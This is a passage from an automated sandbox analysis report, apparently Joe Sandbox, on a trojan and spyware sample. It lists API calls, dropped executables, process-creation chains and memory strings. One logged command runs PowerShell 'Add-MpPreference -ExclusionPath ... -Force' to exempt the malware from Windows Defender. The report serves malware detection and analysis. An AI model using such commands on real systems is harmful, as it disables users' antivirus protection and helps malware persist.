Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction, 20_2_6AB9BE62
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC33E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 20_2_6AC33E22
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB650 RtlUnhandledExceptionFilter,ZwTerminateProcess, 20_2_6ABAB650
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9650 ZwQueryValueKey, 20_2_6ABA9650
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB640 RtlUnhandledExceptionFilter,ZwTerminateProcess, 20_2_6ABAB640
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1FE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC1FE3F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6A7B0 RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwDuplicateToken,ZwSetInformationThread,ZwClose,ZwClose,RtlImpersonateSelfEx, 20_2_6AB6A7B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABEA7AC ZwCompareSigningLevels,ZwCompareSigningLevels, 20_2_6ABEA7AC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA3FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection, 20_2_6ABA3FA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA97A0 ZwUnmapViewOfSection, 20_2_6ABA97A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC15F87 ZwUnmapViewOfSection, 20_2_6AC15F87
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA97F0 ZwOpenThreadTokenEx, 20_2_6ABA97F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB70FFD RtlInitUnicodeString,ZwQueryValueKey, 20_2_6AB70FFD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB937EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory, 20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF0FEC ZwDuplicateObject,ZwDuplicateObject, 20_2_6ABF0FEC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence, 20_2_6AB9DFDF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAFD0 ZwShutdownWorkerFactory, 20_2_6ABAAFD0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFE7D3 ZwOpenThreadTokenEx,ZwOpenThreadTokenEx, 20_2_6ABFE7D3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister, 20_2_6AB6F7C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA97C0 ZwTerminateProcess, 20_2_6ABA97C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 20_2_6AB9E730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9730 ZwQueryVirtualMemory, 20_2_6ABA9730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38F6A RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38F6A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9710 ZwQueryInformationToken, 20_2_6ABA9710
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1CF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose, 20_2_6AC1CF70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB99702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker, 20_2_6AB99702
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9F70 ZwCreateIoCompletion, 20_2_6ABA9F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9770 ZwSetInformationFile, 20_2_6ABA9770
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose, 20_2_6ABF176C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAF60 ZwSetTimer2, 20_2_6ABAAF60
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9750 ZwQueryInformationThread, 20_2_6ABA9750
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1CF30 ZwAlertThreadByThreadId, 20_2_6AC1CF30
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory, 20_2_6AB9174B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA0F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose, 20_2_6ABA0F48
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABEA746 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel, 20_2_6ABEA746
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9740 ZwOpenThreadToken, 20_2_6ABA9740
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38CD6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA0CA1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken, 20_2_6ABA0CA1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE3C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString, 20_2_6ABE3C93
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC214FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC214FB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA480 ZwInitializeNlsFiles, 20_2_6ABAA480
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC164FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose, 20_2_6AC164FB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 20_2_6AB6F4E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1CE4 ZwQueryInformationProcess, 20_2_6ABF1CE4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC34CAB ZwTraceControl, 20_2_6AC34CAB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62CDB RtlFreeHeap,ZwClose,ZwSetEvent, 20_2_6AB62CDB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC39CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC39CB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8FC39 ZwAssociateWaitCompletionPacket, 20_2_6AB8FC39
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA420 ZwGetNlsSectionPtr, 20_2_6ABAA420
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC13C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory, 20_2_6AC13C60
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA0413 ZwUnmapViewOfSection, 20_2_6ABA0413
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38C75 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38C75
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint, 20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1C76 ZwQueryInformationProcess, 20_2_6ABF1C76
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9C70 ZwAlpcConnectPort, 20_2_6ABA9C70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA5C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory, 20_2_6ABA5C70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21411 ZwTraceEvent, 20_2_6AC21411
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 20_2_6AB8746D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38C14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38C14
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread, 20_2_6AB65450
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFC450 RtlReleasePrivilege,ZwAdjustPrivilegesToken,ZwSetInformationThread,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap, 20_2_6ABFC450
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1C49 ZwQueryInformationProcess, 20_2_6ABF1C49
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9C40 ZwAllocateVirtualMemoryEx, 20_2_6ABA9C40
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA95B0 ZwSetInformationThread, 20_2_6ABA95B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9DB0 ZwAlpcSetInformation, 20_2_6ABA9DB0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB665A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 20_2_6AB665A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9DA0 ZwAlpcSendWaitReceivePort, 20_2_6ABA9DA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63591 ZwSetInformationFile, 20_2_6AB63591
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData, 20_2_6AB7DD80
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1BDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 20_2_6AC1BDFA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21582 ZwTraceEvent, 20_2_6AC21582
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB695F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads, 20_2_6AB695F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA95F0 ZwQueryInformationFile, 20_2_6ABA95F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9DE0 ZwAssociateWaitCompletionPacket, 20_2_6ABA9DE0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB645D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread, 20_2_6AB645D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA95D0 ZwClose, 20_2_6ABA95D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation, 20_2_6AB64DC0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA95C0 ZwSetEvent, 20_2_6ABA95C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8EDC4 ZwCancelWaitCompletionPacket, 20_2_6AB8EDC4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 20_2_6AB94D3B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9520 ZwWaitForSingleObject, 20_2_6ABA9520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC26D61 ZwAllocateVirtualMemoryEx, 20_2_6AC26D61
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAD10 ZwSetCachedSigningLevel, 20_2_6ABAAD10
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1D0B ZwSetInformationProcess, 20_2_6ABF1D0B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9D70 ZwAlpcQueryInformation, 20_2_6ABA9D70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose, 20_2_6ABF1570
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1D6A ZwWaitForMultipleObjects, 20_2_6ABF1D6A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1FD22 ZwQueryInformationProcess,RtlUniform, 20_2_6AC1FD22
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB90548 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,ZwQueryVirtualMemory, 20_2_6AB90548
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38D34 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38D34
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1D43 ZwQueryInformationThread, 20_2_6ABF1D43
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE3540 LdrAppxHandleIntegrityFailure,RtlQueryPackageIdentityEx,memset,ZwQueryValueKey,RtlFreeHeap,ZwClose,memset,memset,RtlCaptureContext,RtlReportException,ZwTerminateProcess, 20_2_6ABE3540
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Code function: 22_2_022E48D8 NtAllocateVirtualMemory, 22_2_022E48D8
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Code function: 22_2_022E48D0 NtAllocateVirtualMemory, 22_2_022E48D0
Source: 1254.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 39A7.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5483.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 20BD.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 69B.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 9415.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 16BC.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 3D90.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ssbavbe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: F7E3DjYJpC.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\iwbavbe
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@51/35@62/9
Source: C:\Users\user\AppData\Local\Temp\69B.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 25_2_00401306
Source: F7E3DjYJpC.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource, 25_2_0040A33B
Source: F7E3DjYJpC.exe Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\F7E3DjYJpC.exe 'C:\Users\user\Desktop\F7E3DjYJpC.exe'
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Process created: C:\Users\user\Desktop\F7E3DjYJpC.exe 'C:\Users\user\Desktop\F7E3DjYJpC.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\9A4B.exe C:\Users\user\AppData\Local\Temp\9A4B.exe
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Process created: C:\Users\user\AppData\Local\Temp\9A4B.exe C:\Users\user\AppData\Local\Temp\9A4B.exe
Source: C:\Users\user\AppData\Roaming\iwbavbe Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\69B.exe C:\Users\user\AppData\Local\Temp\69B.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\1254.exe C:\Users\user\AppData\Local\Temp\1254.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\20BD.exe C:\Users\user\AppData\Local\Temp\20BD.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe C:\Users\user\AppData\Local\Temp\31F4.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3C84.exe C:\Users\user\AppData\Local\Temp\3C84.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\46D6.exe C:\Users\user\AppData\Local\Temp\46D6.exe
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5483.exe C:\Users\user\AppData\Local\Temp\5483.exe
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /SpecialRun 4101d8 2812
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\9415.exe C:\Users\user\AppData\Local\Temp\9415.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 'C:\Users\user\AppData\Local\Temp\31F4.exe'
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Roaming\iwbavbe Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /SpecialRun 4101d8 5256
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\ssbavbe C:\Users\user\AppData\Roaming\ssbavbe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\16BC.exe C:\Users\user\AppData\Local\Temp\16BC.exe
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 25_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 28_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 28_2_00408FC9
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\9A4B.tmp
Source: 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
Source: 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND 